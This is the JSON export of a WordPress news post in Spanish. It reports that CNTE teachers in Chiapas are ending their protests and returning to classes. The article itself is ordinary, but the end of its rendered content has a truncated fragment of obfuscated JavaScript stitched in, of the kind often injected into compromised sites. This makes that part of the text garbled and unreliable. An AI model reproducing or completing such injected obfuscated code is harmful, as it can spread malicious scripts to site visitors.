{"id":22317,"date":"2025-06-07T05:59:47","date_gmt":"2025-06-07T05:59:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22317"},"modified":"2025-06-07T05:59:48","modified_gmt":"2025-06-07T05:59:48","slug":"termina-paro-en-chiapas-el-lunes-retorno-a-clases","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22317","title":{"rendered":"Termina paro en Chiapas, el lunes retorno a clases"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"524\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000156632.jpg\" alt=\"\" class=\"wp-image-22318\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000156632.jpg 700w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000156632-300x225.jpg 300w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>6 de junio del 2025. Tuxtla Guti\u00e9rrez.- Este d\u00eda viernes los maestros de la CNTE en Chiapas dieron a conocer que concluyen las acciones de protesta sin dar mayor detalles.<\/p>\n\n\n\n<p>De acuerdo con Jes\u00fas Mendoza V\u00e1zquez los disidentes har\u00e1n un &#8220;repliegue t\u00e1ctico&#8221; para reorganizarse y posteriormente volver a las calles y a las movilizaciones de protesta por distintas demandas.<\/p>\n\n\n\n<p>Asi mismo confirm\u00f3 el lunes regresan a las aulas para el cierre del presente ciclo escolar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 6 de junio del 2025. Tuxtla Guti\u00e9rrez.- Este d\u00eda viernes los maestros de la CNTE en Chiapas dieron a conocer que concluyen las acciones de protesta sin dar mayor detalles. De acuerdo con Jes\u00fas Mendoza V\u00e1zquez los disidentes har\u00e1n un &#8220;repliegue t\u00e1ctico&#8221; para reorganizarse y posteriormente volver a las calles y a las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22318,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22317","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22317","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22317"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22317\/revisions"}],"predecessor-version":[{"id":22319,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22317\/revisions\/22319"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22318"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22317"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22317"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22317"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}